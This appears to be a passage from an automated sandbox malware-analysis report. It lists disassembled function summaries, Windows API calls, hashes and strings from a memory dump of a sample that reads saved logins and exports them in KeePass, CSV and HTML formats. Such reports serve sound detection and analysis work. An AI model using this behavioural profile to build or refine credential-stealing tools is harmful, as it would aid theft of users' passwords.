                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                      • API String ID: 3330709923-517860148
                                                                                      • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                      • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                      APIs
                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                      • String ID: logins$null
                                                                                      • API String ID: 2148543256-2163367763
                                                                                      • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                      • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                      APIs
                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                      • memset.MSVCRT ref: 00408606
                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                      • String ID: ---
                                                                                      • API String ID: 3437578500-2854292027
                                                                                      • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                      • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                      • memset.MSVCRT ref: 00410892
                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                      • String ID:
                                                                                      • API String ID: 1010922700-0
                                                                                      • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                      • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                      APIs
                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                      • free.MSVCRT ref: 004186C7
                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                      • free.MSVCRT ref: 004186E0
                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                      • free.MSVCRT ref: 00418716
                                                                                      • free.MSVCRT ref: 0041872A
                                                                                      • free.MSVCRT ref: 00418749
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                      • String ID: |A
                                                                                      • API String ID: 3356672799-1717621600
                                                                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp
                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                      • API String ID: 2081463915-1959339147
                                                                                      • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                      • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                      APIs
                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 2012295524-70141382
                                                                                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                      • API String ID: 667068680-3953557276
                                                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1700100422-0
                                                                                      • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                      • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                      • String ID:
                                                                                      • API String ID: 552707033-0
                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                      • String ID: 4$h
                                                                                      • API String ID: 4066021378-1856150674
                                                                                      • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                      • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf
                                                                                      • String ID: %%0.%df
                                                                                      • API String ID: 3473751417-763548558
                                                                                      • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                      • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                      • String ID: A
                                                                                      • API String ID: 2892645895-3554254475
                                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                      APIs
                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
